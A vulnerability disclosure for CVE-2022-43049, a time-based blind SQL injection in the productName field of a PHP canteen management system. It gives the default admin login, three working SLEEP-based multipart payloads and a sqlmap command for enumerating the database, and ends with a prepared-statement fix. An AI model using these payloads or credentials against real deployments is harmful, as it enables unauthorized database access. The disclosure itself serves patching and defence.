CVE-2022-43049: bug_report_canteen/SQLi.md at master · sdpyly/bug_report_canteen
Canteen Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the component /youthappam/add-food.php.
Canteen Management System Project v1.0 by mayuri_k has a SQL injection vulnerability
BUG_Author: YorkLee
Login account: [email protected]/rootadmin
Vendor: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
Vulnerability File: /youthappam/add-food.php
Vulnerability location: the POST form handled by /youthappam/add-food.php is affected by a time-based blind SQL injection vulnerability (the injection point in the payloads below is the productName field)
Payload1:

```http
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(5)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"

------WebKitFormBoundarywm9jYBqgKtHi9E5z--
```
Note: the delimiter lines beginning with `------WebKitFormBoundarywm9jYBqgKtHi9E5z` are built from the `boundary` parameter of the request's `Content-Type: multipart/form-data` header.

With `SELECT(SLEEP(5))` in the payload, the server response time is 5 seconds.
Payload2:

```http
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(10)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"

------WebKitFormBoundarywm9jYBqgKtHi9E5z--
```
With `SELECT(SLEEP(10))` in the payload, the server response time is 10 seconds.
Payload3:

```http
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productName"

123' AND (SELECT 5842 FROM (SELECT(SLEEP(15)))JKeV) AND 'jYhF'='jYhF
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="quantity"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="rate"

123
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="categoryName"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="productStatus"

1
------WebKitFormBoundarywm9jYBqgKtHi9E5z
Content-Disposition: form-data; name="create"

------WebKitFormBoundarywm9jYBqgKtHi9E5z--
```
With `SELECT(SLEEP(15))` in the payload, the server response time is 15 seconds.
Payload4:
Save the POST request to a file and let sqlmap enumerate the database from it.

sqlmap cmd: `python .\sqlmap.py -r .\header.txt --tamper=space2comment --risk 3 --current-db`
results:
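The standard fix for this class of bug, as an added example that is not code from the project: the add-food.php form handler written with a PDO prepared statement and per-field validation, so the productName value is passed as bound data and can no longer alter the query. The table and column names, the connection details and the helper name `add_food` are assumptions.

```php
<?php
// Added example (not the project's own code): hardened handler for the
// add-food.php POST form. Table/column names are assumptions.
declare(strict_types=1);

function add_food(PDO $db, array $post): int
{
    // Validate each typed field before it reaches the database layer.
    $name   = trim((string)($post['productName'] ?? ''));
    $qty    = filter_var($post['quantity'] ?? null, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 0]]);
    $rate   = filter_var($post['rate'] ?? null, FILTER_VALIDATE_FLOAT);
    $cat    = filter_var($post['categoryName'] ?? null, FILTER_VALIDATE_INT);
    $status = filter_var($post['productStatus'] ?? null, FILTER_VALIDATE_INT);

    if ($name === '' || mb_strlen($name) > 100 || $qty === false
        || $rate === false || $cat === false
        || !in_array($status, [0, 1], true)) {
        throw new InvalidArgumentException('invalid add-food input');
    }

    // Bound parameters: productName is sent to MySQL as data, never spliced
    // into the SQL text, so a value like
    // "123' AND (SELECT 5842 FROM (SELECT(SLEEP(5)))JKeV) AND 'jYhF'='jYhF"
    // is stored literally and cannot delay or change the statement.
    $stmt = $db->prepare(
        'INSERT INTO food (product_name, quantity, rate, category_id, status)
         VALUES (:name, :qty, :rate, :cat, :status)'
    );
    $stmt->bindValue(':name',   $name,   PDO::PARAM_STR);
    $stmt->bindValue(':qty',    $qty,    PDO::PARAM_INT);
    $stmt->bindValue(':rate',   $rate);
    $stmt->bindValue(':cat',    $cat,    PDO::PARAM_INT);
    $stmt->bindValue(':status', $status, PDO::PARAM_INT);
    $stmt->execute();

    return (int)$db->lastInsertId();
}

// Usage inside add-food.php (assumed connection details). Disabling
// emulated prepares makes MySQL itself do the parameter binding.
// $db = new PDO('mysql:host=localhost;dbname=youthappam;charset=utf8mb4',
//     $user, $pass,
//     [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
//      PDO::ATTR_EMULATE_PREPARES => false]);
// if (isset($_POST['create'])) { add_food($db, $_POST); }
```

A time-based probe like the payloads above then takes the same time as any other insert, which is the simplest regression check for the fix.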